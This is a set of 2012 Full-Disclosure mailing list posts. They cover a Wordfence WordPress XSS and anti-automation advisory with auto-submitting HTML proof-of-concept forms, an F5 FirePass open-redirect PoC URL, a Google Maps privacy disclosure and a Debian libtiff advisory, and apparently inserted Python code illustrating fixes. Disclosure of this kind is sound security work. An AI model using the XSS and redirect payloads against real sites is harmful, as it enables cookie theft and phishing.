Re: [Full-disclosure] vOlk Botnet Framework v4.0 - Multiple Web Vulnerabilities
Full Disclosure Maillist Admin,

Please kindly delete the posted email "vOlk Botnet Framework v4.0 - Multiple Web Vulnerabilities" posted in Full Disclosure, for the security purpose. Understanding the positive purpose of the researchers who expose it; still, this vulnerability's concept cannot be exposed in public, where the merit of its exposure is not equal to the DAMAGE caused by exposing such information. The disclosure damage itself is affecting other botnets' takedown process, which adds to the challenge and effort taken, so takedowns will be harder than before.

vOlk-Botnet 4.0 is a malicious application whose origins have been traced back to Mexico. The system was designed with the common concept of a malicious botnet infrastructure.

---
Hendrik ADRIAN - http://0day.jp
OP #MalwareMustDie http://malwaremustdie.blogspot.com/

Sent to you by ZeroDay.JP via Google Reader:

vOlk Botnet Framework v4.0 - Multiple Web Vulnerabilities
via Full Disclosure on 10/11/12
Posted by Vulnerability Lab on Oct 11

Title: vOlk Botnet Framework v4.0 - Multiple Web Vulnerabilities
Date: 2012-10-09
References: http://www.vulnerability-lab.com/get_content.php?id=721
VL-ID: 721
Common Vulnerability Scoring System: 8.3
Introduction: vOlk-Botnet v4.0 is a remote administration tool; its main function is to manage the HOSTS file of the Windows operating systems. The code created...

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] vOlk Botnet Framework v4.0 - Multiple Web Vulnerabilities
Also, while we're at it, can you please remove all references to common sense and logic in any emails that are in the Full Disclosure archive.

Wait...

On Sun, Oct 21, 2012 at 2:09 PM, ZeroDay.JP <unixfreaxj...@gmail.com> wrote:
> Full Disclosure Maillist Admin, please kindly delete the posted email of vOlk Botnet Framework v4.0 - Multiple Web Vulnerabilities posted in Full Disclosure, for the security purpose. [...]
Re: [Full-disclosure] XSS and IAA vulnerabilities in Wordfence Security for WordPress
Hmm, another 'security' plugin with vulnerabilities... What exactly is the point of them? Even in an ideal world surely WP should be secure anyway - doesn't it just increase the attack surface?

Philip Whitehouse

On 19 Oct 2012, at 18:16, MustLive <mustl...@websecurity.com.ua> wrote:

> Hello list!
>
> I want to warn you about Cross-Site Scripting and Insufficient Anti-automation vulnerabilities in Wordfence Security for WordPress. Wordfence is a security plugin for WordPress.
>
> Affected products:
>
> Vulnerable are Wordfence Security 3.3.5 and previous versions.
>
> Details:
>
> XSS (WASC-08):
>
> Wordfence Security XSS.html
>
> <html>
> <head>
> <title>Wordfence Security XSS exploit (C) 2012 MustLive. http://websecurity.com.ua</title>
> </head>
> <body onLoad="document.hack.submit()">
> <form name="hack" action="http://site/?_wfsf=unlockEmail" method="post">
> <input type="hidden" name="email" value="<script>alert(document.cookie)</script>">
> </form>
> </body>
> </html>
>
> Insufficient Anti-automation (WASC-21):
>
> Wordfence Security IAA.html
>
> <html>
> <head>
> <title>Wordfence Security IAA exploit (C) 2012 MustLive. http://websecurity.com.ua</title>
> </head>
> <body onLoad="document.hack.submit()">
> <form name="hack" action="http://site/?_wfsf=unlockEmail" method="post">
> <input type="hidden" name="email" value="ad...@e-mail.com">
> </form>
> </body>
> </html>
>
> I've informed the plugin developer about the vulnerabilities. And I mentioned these vulnerabilities at my site (http://websecurity.com.ua/6106/).
>
> Best wishes & regards,
> MustLive
> Administrator of Websecurity web site
> http://websecurity.com.ua
Re: [Full-disclosure] XSS and IAA vulnerabilities in Wordfence Security for WordPress
This has been fixed and the release just went out. Version 3.3.7. The email param is now escaped and we've added rate limiting to the form with a 3 minute backoff if the limit is exceeded.

http://wordpress.org/extend/plugins/wordfence/changelog/

Thanks for your report.

Regards,

Mark Maunder.

On Fri, Oct 19, 2012 at 7:16 PM, MustLive <mustl...@websecurity.com.ua> wrote:
> Hello list!
>
> I want to warn you about Cross-Site Scripting and Insufficient Anti-automation vulnerabilities in Wordfence Security for WordPress. [...]

--
Mark Maunder
mmaun...@gmail.com
France: (+33) 068-700-8029
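The two-part fix Mark describes (escape the reflected email parameter, rate-limit the unlock form with a 3-minute backoff) modelled in Python as an added example. This is not Wordfence's PHP code and makes no claim about how the plugin implements it; the 180 s backoff comes from the reply above, while the 3-attempts-per-60 s window, the use of the client IP as the limiter key, and the response wording are assumptions of the example.

```python
import html
import time
from typing import Callable, Dict, List, Tuple

BACKOFF_SECONDS = 180   # the "3 minute backoff" from the fix described on the list
MAX_ATTEMPTS = 3        # assumption: submissions allowed per window before backoff
WINDOW_SECONDS = 60     # assumption: length of the sliding window


class RateLimiter:
    """Per-client limiter: up to MAX_ATTEMPTS submissions inside WINDOW_SECONDS,
    after which that client is refused for BACKOFF_SECONDS. The clock is
    injectable so the backoff can be exercised without sleeping."""

    def __init__(self, clock: Callable[[], float] = time.monotonic) -> None:
        self.clock = clock
        self.attempts: Dict[str, List[float]] = {}
        self.blocked_until: Dict[str, float] = {}

    def allow(self, key: str) -> bool:
        now = self.clock()
        if self.blocked_until.get(key, 0.0) > now:
            return False                        # still inside the backoff
        recent = [t for t in self.attempts.get(key, []) if now - t < WINDOW_SECONDS]
        recent.append(now)
        if len(recent) > MAX_ATTEMPTS:
            self.blocked_until[key] = now + BACKOFF_SECONDS
            self.attempts[key] = []             # window restarts after the backoff
            return False
        self.attempts[key] = recent
        return True


def unlock_email_vulnerable(params: Dict[str, str]) -> Tuple[int, str]:
    """Behaviour as reported for 3.3.5: the POSTed email is reflected into the
    page unescaped, and nothing stops an attacker page like IAA.html from
    auto-submitting the form as often as it likes."""
    email = params.get("email", "")
    return 200, f"<p>An unlock email was sent to {email}.</p>"


def unlock_email_fixed(params: Dict[str, str], client_key: str,
                       limiter: RateLimiter) -> Tuple[int, str]:
    """Hardened handler: refuse the request once the client trips the limiter,
    and HTML-escape the email before it reaches the page."""
    if not limiter.allow(client_key):
        return 429, "<p>Too many unlock requests. Try again later.</p>"
    email = html.escape(params.get("email", ""), quote=True)
    return 200, f"<p>An unlock email was sent to {email}.</p>"


if __name__ == "__main__":
    # Constructed request: the XSS payload from the advisory, from a sample client IP.
    payload = {"email": "<script>alert(document.cookie)</script>"}
    print(unlock_email_vulnerable(payload))
    limiter = RateLimiter()
    for i in range(5):
        print(i + 1, unlock_email_fixed(payload, "203.0.113.5", limiter))
```

The limiter is keyed per client so one abusive source does not lock out everyone; the fourth submission inside the window trips the 180 s block, and a different client is unaffected. A nonce or CAPTCHA on the form is a further control against the cross-site auto-submit in MustLive's PoC, but it is not part of the fix the reply describes and is not modelled here.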
Re: [Full-disclosure] Google Maps pseudonym disclosure vulnerability via Google Places reviews
Update: the Maps team has fixed this issue using both of my suggested patches.

a) Reviews are no longer listed on Maps user profiles, thus removing the forward link
b) Reviews are listed on G+ user profiles, thus making clear the disclosure.

Credit where credit is due.

- Sai

On Mon, Oct 1, 2012 at 6:04 PM, Sai <s...@saizai.com> wrote:

> Recently, Google Places (aka Yelp Lite :-P) got linked to G+ profiles. This linkage has created a potentially serious privacy vulnerability. To my knowledge it has not previously been disclosed; I know it thanks to a tip from a concerned Google Maps user.
>
> So, first off, the integration isn't fully obvious; it's not listed on the G+ About page. It is explicitly disclosed when you opt in to reviews that it will be linked to your profile, just not always obvious afterwards.
>
> Consider for instance +103351126638314796068. His About page doesn't list anything, which would seem to imply that he doesn't want his reviews linked with his G+ profile (which has what is presumably his legal name). However, if you go to https://plus.google.com/local/*/s/by%3A103351126638314796068 (same ID number) you'll find that he has reviewed +10071232321655907. (Although that personal reviews link _doesn't_ link to his G+ profile directly, the restaurant's Page _does_ do so, and of course it's intrinsic to the ID number in the URL.) If you do a Google search for the review text, you can see that at least one third-party site has already scraped it.
>
> Now, this wouldn't be too bad by itself. It's a couple of UI flaws, and to my knowledge you can't get from here to what I'm about to talk about, only the other way 'round.
>
> However, suppose that instead you had started by looking at this map of the West Coast Electric Highway: https://maps.google.com/maps/ms?hl=en&gl=us&ie=UTF8&oe=UTF8&msa=0&msid=214874436355124459198.0004c15567ce4ce290f50
>
> You can see that it was created by someone with the username _jimad_. Click that, and you go to an anonymous Google Maps profile page, which lists another two maps made by jimad… and what seems to be an anonymous review of +10071232321655907. However, if you google the review text — or just click through the restaurant's name — you can then search through the reviews, and see that the writer of that review was in fact +103351126638314796068.
>
> So to review, the improper disclosure — which is _not_ anywhere consented to or explained to my knowledge — is that the Google Maps profile _jimad_ belongs to _+103351126638314796068_. (TTBOMK you can't get the reverse linkage; please let me know if not.)
>
> In this case, that disclosure is relatively innocuous; knowing who has mapped the West Coast Electric Highway isn't that big a deal. Consider other cases, though, where the creator of a map may have a significant privacy interest in their identity not being disclosed, like this map of porn stores and churches on I-70, by Google Maps user Taylor: http://goo.gl/maps/7avuJ; or this map of Mumbai attacks by user Omar: http://goo.gl/maps/dKbcA. Both are currently safe — the only thing disclosed is a separate name, and it's not linked to their G+ profiles or legal names. If either of them were to, say, review a restaurant, they would be told and have the impression that the only link they are creating is between their profile and the review. However, what they would also be creating is a public link between their _maps_ and their profile, and this isn't something they would've consented to.
>
> This can be mitigated pretty easily: just patch the Google Maps profile page to remove the reviews section, and/or make explicit the linkage in the opt-in consent for Google Places. However, it's already public, and the data's probably already been scraped significantly, so at this point it can't be fully fixed.
>
> I hope that the Google Maps, Places, and Plus teams take immediate action to correct this before it results in a leak that hurts someone — and thanks again to my anonymous informant for the tip.
>
> - Sai
>
> posted originally to: https://plus.google.com/103112149634414554669/posts/F12kZrPrwm2 — look for updates there, and +### are Google+ profile links
Re: [Full-disclosure] vOlk Botnet Framework v4.0 - Multiple Web Vulnerabilities
As requested, re-sent w/o references:

Full Disclosure Maillist Admin,

Please kindly delete the posted email "vOlk Botnet Framework v4.0 - Multiple Web Vulnerabilities" posted in Full Disclosure, for the security purpose. Understanding the positive purpose of the researchers who expose it; still, this vulnerability's concept cannot be exposed in public, where the merit of its exposure is not equal to the DAMAGE caused by exposing such information. The disclosure damage itself is affecting other botnets' takedown process, which adds to the challenge and effort taken, so takedowns will be harder than before.

vOlk-Botnet 4.0 is a malicious application whose origins have been traced back to Mexico. The system was designed with the common concept of a malicious botnet infrastructure.

---
Hendrik ADRIAN - http://0day.jp
OP #MalwareMustDie http://malwaremustdie.blogspot.com/

On Sun, Oct 21, 2012 at 10:21 PM, Benji <m...@b3nji.com> wrote:
> also while we're at it can you please remove all references to common sense and logic in any emails that are in the full disclosure archive. wait...
>
> On Sun, Oct 21, 2012 at 2:09 PM, ZeroDay.JP <unixfreaxj...@gmail.com> wrote:
> > Full Disclosure Maillist Admin, please kindly delete the posted email of vOlk Botnet Framework v4.0 - Multiple Web Vulnerabilities posted in Full Disclosure, for the security purpose. [...]
[Full-disclosure] F5 FirePass SSL VPN 4xxx Series | Arbitrary URL Redirection
1. OVERVIEW

F5 FirePass SSL VPN is vulnerable to Open URL Redirection.

2. BACKGROUND

F5 FirePass SSL VPN provides secure remote access to enterprise applications and data for users over any device or network while protecting your corporate. (See http://www.f5.com/pdf/products/firepass-overview.pdf)

3. VULNERABILITY DESCRIPTION

F5 FirePass SSL VPN contains a flaw that allows a remote cross-site redirection attack. This flaw exists because the application does not validate the refreshURL parameter upon submission to the my.activation.cns.php3 script. This could allow a user to create a specially crafted URL that, if clicked, would redirect a victim from the intended legitimate web site to an arbitrary web site of the attacker's choosing.

4. VERSIONS AFFECTED

4xxx Series

5. PROOF-OF-CONCEPT/EXPLOIT

https://[VPN_HOST]/my.activation.cns.php3?langchar=&ui_translation=&refreshURL=http://yehg.net/

6. SOLUTION

We have not been informed of the fix. We believe this issue should be fixed by the time of releasing our advisory.

7. VENDOR

F5 Networks, Inc.

8. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.

9. DISCLOSURE TIME-LINE

2012-03-31: notified vendor
2012-04-04: vendor acknowledged
2012-10-20: vulnerability disclosed

10. REFERENCES

Original Advisory URL: http://yehg.net/lab/pr0js/advisories/%5BF5_firepass4x%5D_url_redirection
OWASP Top 10 2010 - A10: http://www.owasp.org/index.php/Top_10_2010-A10-Unvalidated_Redirects_and_Forwards
SANS Top 25 - Rank 23: http://cwe.mitre.org/top25/#CWE-601
CWE-601: http://cwe.mitre.org/data/definitions/601.html

#yehg [2012-10-20]

-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd
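What a fix for this class of bug looks like, as an added Python example that is not code from F5 or from the YGN advisory: the redirect target is accepted only as a site-relative path or as an https URL to an allow-listed host, and anything else falls back to a default. The allow-listed hostname vpn.example.com, the default target "/", and the function name are assumptions of the example; the advisory's own PoC value (refreshURL=http://yehg.net/) is the first input it rejects. The checks for control characters, backslashes and userinfo tricks go beyond the single case in the advisory and cover the usual ways a naive "starts with /" or "contains my host" check gets bypassed.

```python
from urllib.parse import urlsplit, urlunsplit

# Assumptions for this example: the VPN appliance's own hostname (hypothetical)
# is the only host an absolute refreshURL may point at, and "/" is where a
# rejected value sends the user instead.
ALLOWED_HOSTS = {"vpn.example.com"}
DEFAULT_TARGET = "/"


def safe_redirect_target(value, allowed_hosts=ALLOWED_HOSTS, default=DEFAULT_TARGET):
    """Validate a user-supplied redirect target such as refreshURL.

    Accepts only (a) a site-relative path starting with a single "/" or
    (b) an https URL whose host is allow-listed; anything else returns `default`.
    """
    # Control characters (tab, newline, ...) are stripped by browsers and can
    # smuggle "\tjavascript:" or "/\n/evil" past naive prefix checks: refuse them.
    if not value or any(ord(ch) < 0x20 or ch == "\x7f" for ch in value):
        return default

    parts = urlsplit(value)

    if parts.scheme or parts.netloc:
        # Absolute URL (http://yehg.net/, //yehg.net/, javascript:...).
        # parts.hostname drops userinfo and port, so "https://vpn.example.com@yehg.net/"
        # is seen for what it is: a request to land on yehg.net.
        if parts.scheme.lower() != "https" or parts.hostname not in allowed_hosts:
            return default
        return urlunsplit(("https", parts.hostname, parts.path or "/",
                           parts.query, parts.fragment))

    # Relative target. Browsers treat a backslash as "/", so "/\yehg.net"
    # would become the protocol-relative "//yehg.net" if it were passed through.
    path = parts.path.replace("\\", "/")
    if not path.startswith("/") or path.startswith("//"):
        return default
    return urlunsplit(("", "", path, parts.query, parts.fragment))


if __name__ == "__main__":
    # Constructed inputs, the first being the advisory's own PoC value.
    for candidate in ["http://yehg.net/", "//yehg.net/", "/\\yehg.net",
                      "https://vpn.example.com@yehg.net/", "javascript:alert(1)",
                      "/my.portal?lang=en", "https://vpn.example.com/portal"]:
        print(f"{candidate!r:45} -> {safe_redirect_target(candidate)!r}")
```

The important design choice is to decide on the parsed structure (scheme, netloc, hostname) rather than on string prefixes: every bypass in the demo list is a string that looks harmless to a prefix check but parses to an off-site destination.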
[Full-disclosure] [SECURITY] [DSA 2561-1] tiff security update
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- -------------------------------------------------------------------------
Debian Security Advisory DSA-2561-1                   secur...@debian.org
http://www.debian.org/security/                        Moritz Muehlenhoff
October 21, 2012                       http://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : tiff
Vulnerability  : buffer overflow
Problem type   : local(remote)
Debian-specific: no
CVE ID         : CVE-2012-4447

It was discovered that a buffer overflow in libtiff's parsing of files using PixarLog compression could lead to the execution of arbitrary code.

For the stable distribution (squeeze), this problem has been fixed in version 3.9.4-5+squeeze6.

For the testing distribution (wheezy) and the unstable distribution (sid), this problem has been fixed in version 3.9.6-9 of the tiff3 source package and in version 4.0.2-4 of the tiff source package.

We recommend that you upgrade your tiff packages.

Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)

iEYEARECAAYFAlCEHHIACgkQXm3vHE4uylrbNgCgj1z+KMxqNBioKct5cwa7qD6S
P2IAnjjisFo2oDGBS3cH4IECT7CVYxOd
=4Wjs
-----END PGP SIGNATURE-----
Re: [Full-disclosure] F5 FirePass SSL VPN 4xxx Series | Arbitrary URL Redirection
On Oct 21, 2012, at 6:38 AM, YGN Ethical Hacker Group <li...@yehg.net> wrote:

> 4. VERSIONS AFFECTED
>
> 4xxx Series

What versions of firmware are at risk?